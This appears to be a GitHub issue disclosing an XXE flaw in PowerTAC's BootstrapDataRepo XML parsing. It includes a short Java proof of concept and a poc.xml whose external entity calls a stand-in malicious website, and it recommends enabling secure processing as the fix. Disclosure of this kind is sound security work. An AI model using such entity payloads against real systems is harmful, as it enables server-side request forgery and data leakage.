You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Description:
A XXE vulnerability might be exploited when reading Bootstrap data from XML files:
Since the DocumentBuilderFactory instance here does not enable security settings or disable external entities loading, which leads to potential XXE exploitation if the URL or the file behind URL is under control of the malicious guys, leading to SSRF, information leak and so on
POC:
import org.powertac.common.repo.BootstrapDataRepo;
import java.net.MalformedURLException;
import java.net.URL;
public class PowertacPoC {
public static void main(String[] args) throws MalformedURLException {
BootstrapDataRepo bootstrapDataRepo = new BootstrapDataRepo();
URL maliciousXMLURL = new URL("file:poc.xml");
bootstrapDataRepo.readBootRecord(maliciousXMLURL);
}
}
poc.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://replace.with.malicious.website">]>
<root>&xxe;</root>
And I can see the request in from the other side(malicious website)
Recommendation: factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
Hi team,
Description:
A XXE vulnerability might be exploited when reading Bootstrap data from XML files:
Since the DocumentBuilderFactory instance here does not enable security settings or disable external entities loading, which leads to potential XXE exploitation if the URL or the file behind URL is under control of the malicious guys, leading to SSRF, information leak and so on
POC:
poc.xml:
And I can see the request in from the other side(malicious website)
Recommendation:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
Affected Component:
https://mvnrepository.com/artifact/org.powertac/server-interface <= 1.9.0
https://github.com/powertac/powertac-server <= powertac-server-1.9.0
The text was updated successfully, but these errors were encountered: